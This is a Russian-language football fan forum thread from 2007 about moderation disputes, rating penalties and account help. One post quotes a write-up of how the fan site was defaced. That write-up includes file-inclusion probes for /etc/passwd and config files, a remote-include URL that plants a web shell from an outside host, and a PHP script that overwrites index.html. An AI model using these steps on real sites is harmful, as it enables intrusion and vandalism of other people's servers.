Вопрос к АДМИНИСТРАТОРАМ!
Отправлено 26 July 2007 - 16:16

Гость_Dim Scoffer_*
Отправлено 26 July 2007 - 18:08
Они ж такие, им нейметься, уже бы завалили почту бредом всяким.
Отправлено 26 July 2007 - 18:25
думаю стОит так и сделать. а то как-то несолидноЕсли кому нужны эти цифры, то давайте сделаем восстановление данных по состоянию на 25ое число. Умник Евгений с радостью выполнит нашу просьбу.

The show must go on,
Inside my heart is breaking
My make-up may be flaking
But my smile still stays on.
Гость_Dim Scoffer_*
Отправлено 26 July 2007 - 18:33
Отправлено 26 July 2007 - 19:29
------------------------------------------------------------------------------------------------------------------------------
Как ломался fc-arsenal.com
[ Хакерство в Интернете ]
Зеркало: //taxidermia.void.ru/mirrors/2002/12/...fc-arsenal.com/ Все началось 21.12.2002 с того, что какой-то чел написал в гостевой книге на моём сайте чтобы я попробовал взломать www.fc-arsenal.com. В этот вечер делать было нечего, скукатища полная, ну думаю попробую, да и не фанат я Арсенала

Зашел на сайт, поглядел че там и как. Решил для начала посмотреть наличие форумов. Но их там не оказалось! Гостевая книга и чат вроде тоже без багов. И тогда я наткнулся на скрипт новостей. Открыл его в новом окне, путь был таким - //www.fc-arsenal.com/new/main.php?news/news.php. Вот это строка - main.php?news/news.php - меня удивила! Не ужели это то, о чем я думаю? Не может быть! На таком сайте, такая дыра... ДА, действительно, скрипт вставляет в правый фрейм файл, указанный в параметрах его запуска.
Я попробовал main.php?/etc/passwd и передо мной отобразился /etc/passwd. Естественно, что ниче хорошего я там не обнаружил. Тогда я попробовал main.php?/etc/shadow и main.php?/etc/master.passwd, но паролей я не получил, прав на чтение таких файлов не хватает. После этого я попробовал найти какие-нибудь файлы, в которых могут хранится пароли или какая-нибудь полезная информация, например логин и пароль от MySQL.
main.php?../_vti_pvt/service.pwd
main.php?../.htaccess
main.php?../.htpasswd
main.php?../../.htpasswd
main.php?../config.php
main.php?config.inc
main.php?config.php
Но успехом эти запромы не увенчались, никаких паролей я не получил. Попробовал найти и получить админку гостевой книги, но её там помоему вообще нет! Новости на сайт скорее всего добавляются автоматически через какой-то скрипт, и возможно требуется авторизация для доступа к нему. Но опять же ничего полезного я не нашел И тогда я решил попробовать указать ссылку на мой PHP скрипт. main.php?//overgsite.net/createshell.php. Получилось! Этот скрипт создал мне Httpd Shell на сервере, ввёл команду id - мои права - arsenal

Я написал простенький скрипт для дефейса, который открывал index.html и записывал туда "текст дефейса". Вот этот скрипт (deface.php):
$opnfile=fopen("../index.html","w");
fwrite($opnfile,"DWC Gr0up own U

Болейте за российский футбол!
");
fclose($opnfile);
Стоило мне только выполнить main.php?//overgsite.net/deface.php и все! Сайт задефейсен!
P.S. Болейте за российский футбол

Aleg G (ciberinfo.ru)
------------------------------------------------------------------------------------------------------------------------------
Что за *редиска* заказала?!?!?!
На все все вопросы не будет ответа...
Отправлено 26 July 2007 - 21:18
вроде как да.А этот откат только счетчики вернет на место, или и все посты что после 25 написаны вытрет?
так вроде делали когда тот "мясник" залезал.
The show must go on,
Inside my heart is breaking
My make-up may be flaking
But my smile still stays on.
Отправлено 27 July 2007 - 06:42
Существует ли справедливость или крик души?!
Вчера в топике про ключевого игрока Арсенала Александра Глеба я имел наглость заявить, что сего талантливейшего игрока неплохо бы продать, т.к. лично на мой взгляд, его игра оставляет желать много лучшего…
Буквально сразу же я получил довольно жёсткий отпор от болельщика Shnur’а(полагаю что он защищал своего земляка), который своим сообщением прямо сказал что лучше бы куда сплавить меня....
Я решил ответить дерзостью на дерзость, так как по своей природе обладаю довольно вспыльчивым нравом…
Через час наши посты были удалены, а мне модератором EdPM был поднят рейтинг до 10% по причине «личная переписка на форуме», очень обидно, но это случилось впервые за мое пребывание на любимом форуме…
Что имеем в итоге:
я всего лишь ОТВЕТИЛ на нелицеприятное высказывание в свою сторону и «личную переписку», если это можно так назвать, начал опять же не я.
Еще вопрос – а модератор EdPM поднял моему оппоненту рейтинг? Очень вряд ли мне кажется, по общеизвестным причинам...
И последний вопрос – ЗА ЧТО МНЕ ДАЛИ 10% ? За то что мне не нравится Глеб как игрок? Или я должен молчать по этому поводу дабы словесно не осквернять кумира наших братьев славян?
Сообщение отредактировал gunner_max: 27 July 2007 - 09:30
Гость_EdPM_*
Отправлено 27 July 2007 - 07:05
Уважаемая администрация!
Существует ли справедливость или крик души?!
Вчера в топике про ключевого игрока Арсенала Александра Глеба я имел наглость заявить, что сего талантливейшего игрока неплохо бы продать, т.к. лично на мой взгляд, его игра оставляет желать много лучшего…
Буквально сразу же я получил довольно жёсткий отпор от болельщика Shnur’а(полагаю что он защищал своего земляка), который своим сообщением прямо сказал что лучше бы куда сплавить меня....
Я решил ответить дерзостью на дерзость, так как по своей природе обладаю довольно вспыльчивой натурой…
Через час наши посты были удалены, а мне модератором EdPM был поднят рейтинг до 10% по причине «личная переписка на форуме», очень обидно, но это случилось впервые за мое пребывание на любимом форуме…
Что имеем в итоге:
я всего лишь ОТВЕТИЛ на нелицеприятное высказывание в свою сторону и «личную переписку», если это можно так назвать, начал опять же не я.
Еще вопрос – а модератор EdPM поднял моему оппоненту рейтинг? Очень вряд ли мне кажется, по общеизвестным причинам...
И последний вопрос – ЗА ЧТО МНЕ ДАЛИ 10% ? За то что мне не нравится Глеб как игрок? Или я должен молчать по этому поводу дабы словесно не осквернять кумира наших братьев славян?
Отвечаю. Переписка на форуме была? Была. Факт. Это нарушает правила форкма? НАрушает. Наказание заслуженное? По моему да. Если кто-то не согласен - озвучьте доводы, плз. По поводу неаказания Shnur'a. В данной ситуации я просто могу повлиять и покорить его лично. В отличие от gunner_max'a. Если кто-то видит в этом двойные стандарты, тогда "ой". Поднимем уровень и ему.
Отправлено 27 July 2007 - 07:14
Спасибо за честный ответ, по поводу "ненаказания" Шнура я не ошибся....Отвечаю. Переписка на форуме была? Была. Факт. Это нарушает правила форкма? НАрушает. Наказание заслуженное? По моему да. Если кто-то не согласен - озвучьте доводы, плз. По поводу неаказания Shnur'a. В данной ситуации я просто могу повлиять и покорить его лично. В отличие от gunner_max'a. Если кто-то видит в этом двойные стандарты, тогда "ой". Поднимем уровень и ему.
А раз была "переписка" и начали наказывать - то наказывать обоих!
Причем, на мой взгляд, Шнуру надо давать не 10%, а целых 20% и объясню почему - 10% за переписку как таковую и 10% за то что он является инициатором этой переписки!
Или же мне снять незаслуженные 10%...В этом случае буду стараться не поддаваться на подлые провокации форумчан, имеющих поддержку среди лиц администрации!
Сообщение отредактировал gunner_max: 27 July 2007 - 07:17
Гость_Denis4_*
Отправлено 27 July 2007 - 07:19
Гость_Dim Scoffer_*
Отправлено 28 July 2007 - 21:57
Прошу простить мне склонность к цитатам, но, полагаю, обе стороны поняли.
Отправлено 02 August 2007 - 08:54
ибо забыл пароль, а восстановить ни как не получается

Отправлено 02 August 2007 - 09:08
напиши в личку какой был логин и какой хочешь парольтоварищи админы, помогите восстановить старый аакаунт!
ибо забыл пароль, а восстановить ни как не получается
не нравятся правила форума — ищи другой форум
Отправлено 02 August 2007 - 09:27
//www.fc-arsenal.com/ipb/index.php?showtopic=1523
НА ГЛАВНОЙ, МОЖНО ДАЖЕ КАКОЙ-НИБУДЬ GIF ПРОСТЕНЬКИЙ И НА ШАПКЕ ФОРУМА!
Отправлено 02 August 2007 - 09:43
на главной пока делать не будем..прошу не спрашивать почему..ПРОСЬБА СДЕЛАТЬ ЛИНК НА ЭТУ ТЕМУ:
//www.fc-arsenal.com/ipb/index.php?showtopic=1523
НА ГЛАВНОЙ, МОЖНО ДАЖЕ КАКОЙ-НИБУДЬ GIF ПРОСТЕНЬКИЙ И НА ШАПКЕ ФОРУМА!
на форуме сделал

Гость_kust_*
Отправлено 02 August 2007 - 12:11

Ну почему у меня лично до сих пор нет тыцки "удалить" , а ?

Сообщение отредактировал kust: 02 August 2007 - 12:20
Отправлено 02 August 2007 - 12:15
Аля, "оФициальный" это правильно!Друзья , прибавьте еще одну буковку ф в слово оффициальный ( фан-клуб ) на шапке нашего сайта
![]()
А то висит безграмотное чудо "официальный"![]()
Все-таки такое гордое слово должно быть написано правильно .
with best regards
ваша kust

Отправлено 02 August 2007 - 12:49
Аля, проверь сейчасНу почему у меня лично до сих пор нет тыцки "удалить" , а ?
зы. добавил к шапке форума ссылки по отделениям фан-клуба
Отправлено 02 August 2007 - 17:31

AMGшник с опытом
Отправлено 03 August 2007 - 05:04
//www.fc-arsenal.com/ipb/index.php?sh...449&st=1700та зачем ему чтото покупать када тут во всю, абсолютно бесплатно, некие резиновые куклы особождают то, чем их временами наполняли
![]()
На каком основании я должна мириться с подобными высказываниями? Упущу предисторию, потому что допускаю, что можно усомниться в моей проф.пригодности, хотя за 12 лет работы на одном месте жалоб не поступало. НО! Почему унижают мое женское достоинство? Или по вашему это нормально? Лично я считаю, что это удар ниже пояса, это нарушение fair play. Это не то чтобы неблагородно, это подло ваще. Я понимаю, что этот товарищ ваш друг, но тем более, почему он позволяет такие высказывания в адрес малознакомой женщины? Пусть он маме так скажет, а я вполне вероятно её ровесница. Да пусть я трижды тупой архитектор-дизайнер в глазах айтишника, но никогда не позволяла себе оскорблений в подобном духе. Сначала я пыталась сама как-то разобраться с данной ситуацией, пыталась проглотить эту обиду, но полученный резонанс вверг меня в шок. И самое страшное – это то, что у меня подорвалась вера в справедливость и адекватность форумчан. Слава Богу не во всех. Куда катится этот мир? Кто здесь неадекватен? Алле? Искренне надеюсь, что многие были просто не в курсе причины ссоры и судили поверхностно. Вообщем, мне бы хотелось получить извинения от товарисча Валькирия хотя бы в приватной форме. Ответ типа «Хорошая в Казахстане трава» не принимается. Да какая к черту трава? Не надо из меня монстра делать. Я эту траву один раз в жизни и пробовала, ажно 18 лет назад, будучи студенткой.
И еще хочу обратить внимание администрации на грубое ко мне обращение пользователем Dim Scoffer в данном диалоге: //www.fc-arsenal.com/ipb/index.php?sh...787&st=1120
Поскольку нашу команду итак называют дворовой, я хочу чтобы случился хэппи-энд и вернулись Дин с Анелькой. Эти два блуднейших сына, но только чтобы мозги у них уже нормально вправленные были, и чтобы они в одном направлении с Арсеналом двигались до скончания дней своих, до скончания дней своих.
![]()
![]()
Утопия наверно.
На каком основании он позволяет подобную фамильярность? Мы с ним на бруденшарфт не пили , я просто высказала свое мнение, которое имеет право на жизнь и не противоречит названию темы. Затрите пожалуйста тот пост, который считаете нужным.ArsStyle, опохмелись.
Прошу прощение за то, что отнимаю ваше время, но для меня очень важно разрешение данного инциндента. Неохота жить с таким пятном в душе и покидать полюбившийся форум. Вероятно, мне надо было сразу обратиться за помощью к администрации.
Количество пользователей, читающих эту тему: 2
0 пользователей, 2 гостей, 0 скрытых пользователей